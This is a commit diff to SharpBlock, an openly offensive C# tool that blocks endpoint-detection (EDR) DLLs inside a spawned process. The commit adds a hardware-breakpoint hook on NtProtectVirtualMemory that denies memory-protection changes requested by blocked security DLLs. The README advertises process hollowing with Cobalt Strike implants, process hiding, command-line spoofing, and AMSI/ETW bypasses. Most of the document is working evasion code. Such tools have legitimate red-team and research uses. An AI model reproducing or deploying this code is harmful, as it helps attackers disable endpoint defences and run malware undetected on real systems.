Bypass also on NtProtectVirtualMemory to block EDR's that hook via non DLL entry point methods

Author: CCob

Context.cs

@@ -70,5 +70,7 @@ public ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue) {
         public abstract void SetRegister(int index, long value);
 
         public abstract long GetRegister(int index);
+
+        public abstract long GetParameter(int index, IntPtr hProcess);
     }
 }

Context32.cs

@@ -104,5 +104,13 @@ public override long GetRegister(int index) {
                     throw new NotImplementedException();
             }
         }
+
+        public override long GetParameter(int index, IntPtr hProcess) {
+            long parameterAddress = ctx.Esp + 4 + (index * 4);            
+            byte[] parameterValue = new byte[4];
+            IntPtr bytesRead;
+            WinAPI.ReadProcessMemory(hProcess, new IntPtr(parameterAddress), parameterValue, 4, out bytesRead);
+            return BitConverter.ToUInt32(parameterValue, 0);
+        }
     }
 }

Context64.cs

@@ -136,5 +136,21 @@ protected override bool SetContext(IntPtr thread, IntPtr context) {
         protected override bool GetContext(IntPtr thread, IntPtr context) {
             return WinAPI.GetThreadContext(thread, context);
         }
+
+        public override long GetParameter(int index, IntPtr hProcess) {
+
+            switch (index) {
+                case 0:
+                    return (long)ctx.Rcx;
+                case 1:
+                    return (long)ctx.Rdx;
+                case 2:
+                    return (long)ctx.R8;
+                case 3:
+                    return (long)ctx.R9;
+            }
+
+            throw new NotImplementedException("Only 4 parameters or less currently supported");   
+        }
     }
 }

Program.cs

@@ -28,8 +28,10 @@ class Program {
         static Execute.DynamicInvoke.Native.DELEGATES.NtProtectVirtualMemory NtProtectVirtualMemorySysCall;
 
         static Program() {
-            NtWriteVirtualMemorySysCall = GetDelagateForSysCall<Execute.DynamicInvoke.Native.DELEGATES.NtWriteVirtualMemory>(Execute.DynamicInvoke.Generic.GetSyscallStub("NtWriteVirtualMemory"));
-            NtProtectVirtualMemorySysCall = GetDelagateForSysCall<Execute.DynamicInvoke.Native.DELEGATES.NtProtectVirtualMemory>(Execute.DynamicInvoke.Generic.GetSyscallStub("NtProtectVirtualMemory"));
+            if (IntPtr.Size == 8) {
+                NtWriteVirtualMemorySysCall = GetDelagateForSysCall<Execute.DynamicInvoke.Native.DELEGATES.NtWriteVirtualMemory>(Execute.DynamicInvoke.Generic.GetSyscallStub("NtWriteVirtualMemory"));
+                NtProtectVirtualMemorySysCall = GetDelagateForSysCall<Execute.DynamicInvoke.Native.DELEGATES.NtProtectVirtualMemory>(Execute.DynamicInvoke.Generic.GetSyscallStub("NtProtectVirtualMemory"));
+            }
         }
 
         static D GetDelagateForSysCall<D>(IntPtr syscallStub) where D : Delegate {
@@ -48,6 +50,7 @@ public struct HostProcessInfo {
         static List<string> blockDescription = new List<string>();
         static List<string> blockCopyright = new List<string>();
         static List<string> blockProduct = new List<string>();
+        static List<Tuple<long,long>> blockAddressRanges = new List<Tuple<long, long>>();
 
         static IntPtr amsiInitalizePtr;
         static IntPtr getCommandLineWPtr;
@@ -118,6 +121,11 @@ static bool WriteProcessMemory(IntPtr hProcess, IntPtr baseAddress, byte[] data,
             }            
         }
 
+        static bool IsInBlockedRange(long address) {
+            var result = blockAddressRanges.Where(range => address >= range.Item1 && address < range.Item2).FirstOrDefault();
+            return result != null;
+        }
+
         static string PatchEntryPointIfNeeded(IntPtr moduleHandle, IntPtr imageBase, IntPtr hProcess) {
 
             long fileSize;
@@ -151,21 +159,27 @@ static string PatchEntryPointIfNeeded(IntPtr moduleHandle, IntPtr imageBase, Int
 
             UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
             IntPtr entryPoint;
+            long sizeOfImage;
             if ((fileHeader.Characteristics & IMAGE_FILE_32BIT_MACHINE) == IMAGE_FILE_32BIT_MACHINE) {
                 PE.IMAGE_OPTIONAL_HEADER32 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER32)Marshal.PtrToStructure
                     (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER32));
 
                 entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt32());
+                sizeOfImage = optionalHeader.SizeOfImage;
 
             } else {
                 PE.IMAGE_OPTIONAL_HEADER64 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER64)Marshal.PtrToStructure
                     (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER64));
 
                 entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt64());
+                sizeOfImage = optionalHeader.SizeOfImage;
             }
 
             if (ShouldBlockDLL(dllPath.ToString())) {
 
+                Tuple<long, long> addressRange = new Tuple<long, long>((long)imageBase, (long)imageBase + sizeOfImage);
+                blockAddressRanges.Add(addressRange);
+
                 Console.WriteLine($"[+] Blocked DLL {dllPath}");
 
                 byte[] retIns = new byte[1] { 0xC3 };
@@ -657,6 +671,20 @@ private static void SetNewProcessParent(ref STARTUPINFOEX startupInfoEx, int par
             }
         }
 
+        private static void BlockVirtualProtect(IntPtr hThread, IntPtr hProcess) {
+
+            Context ctx = ContextFactory.Create(ContextFlags.All);
+            ctx.GetContext(hThread);
+
+            long returnAddress = (long)ctx.GetCurrentReturnAddress(hProcess);
+            long protection = ctx.GetParameter(3, hProcess);
+
+            if (protection == 0x40 && IsInBlockedRange(returnAddress)) {
+                Console.WriteLine("[+] Attempt to change memory to RWX from blocked DLL denied");
+                OverrideReturnValue(hThread, hProcess, new UIntPtr(0xC0000022), 5);               
+            }                
+        }
+
         static void StdOutReader(StreamReader sr) {
 
             try {
@@ -731,6 +759,7 @@ static void Main(string[] args) {
 
                 IntPtr ntdllBase = WinAPI.LoadLibrary("ntdll.dll");
                 IntPtr etwEventWritePtr = WinAPI.GetProcAddress(ntdllBase, "EtwEventWrite");
+                IntPtr ntProtectVirtualMemoryPtr = WinAPI.GetProcAddress(ntdllBase, "NtProtectVirtualMemory");
 
                 Console.WriteLine($"[+] in-proc amsi 0x{amsiBase.ToInt64():x16}");
                 Console.WriteLine($"[+] in-proc ntdll 0x{ntdllBase.ToInt64():x16}");
@@ -796,6 +825,8 @@ static void Main(string[] args) {
                                 if (bypassAmsi)
                                     SetHardwareBreakpoint(CreateProcessDebugInfo.hThread, amsiInitalizePtr, 0);
 
+                                SetHardwareBreakpoint(CreateProcessDebugInfo.hThread, ntProtectVirtualMemoryPtr, 3);
+
                                 break;
                             case WinAPI.CREATE_THREAD_DEBUG_EVENT:
                                 WinAPI.CREATE_THREAD_DEBUG_INFO CreateThreadDebugInfo = (WinAPI.CREATE_THREAD_DEBUG_INFO)Marshal.PtrToStructure(debugInfoPtr, typeof(WinAPI.CREATE_THREAD_DEBUG_INFO));
@@ -807,6 +838,8 @@ static void Main(string[] args) {
 
                                     if(bypassETW)
                                         SetHardwareBreakpoint(threadHandles[DebugEvent.dwThreadId], etwEventWritePtr, 2);
+
+                                    SetHardwareBreakpoint(CreateThreadDebugInfo.hThread, ntProtectVirtualMemoryPtr, 3);
                                 }
 
                                 break;
@@ -882,6 +915,11 @@ static void Main(string[] args) {
                                     }else if(ExceptionDebugInfo.ExceptionRecord.ExceptionAddress == etwEventWritePtr) {
                                         //We have hit EtwEventWrite so lets just return with a fake success result
                                         OverrideReturnValue(threadHandles[DebugEvent.dwThreadId], processHandles[DebugEvent.dwProcessId], new UIntPtr(0), 5);
+                                    }else if(ExceptionDebugInfo.ExceptionRecord.ExceptionAddress == ntProtectVirtualMemoryPtr) {
+                                        BlockVirtualProtect(threadHandles[DebugEvent.dwThreadId], processHandles[DebugEvent.dwProcessId]);
+                                        SetHardwareBreakpoint(threadHandles[DebugEvent.dwThreadId], ntProtectVirtualMemoryPtr, 3);
+                                    } else {
+                                        SetHardwareBreakpoint(threadHandles[DebugEvent.dwThreadId], ntProtectVirtualMemoryPtr, 3);
                                     }
 
                                 } else {

README.md

@@ -8,7 +8,8 @@ A method of bypassing EDR's active projection DLL's by preventing entry point ex
 * Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike)
 * Implanted process is hidden to help evade scanners looking for hollowed processes.
 * Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
-* Patchless ETW bypass 
+* Patchless ETW bypass.
+* Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space
 
 ```
 SharpBlock by @_EthicalChaos_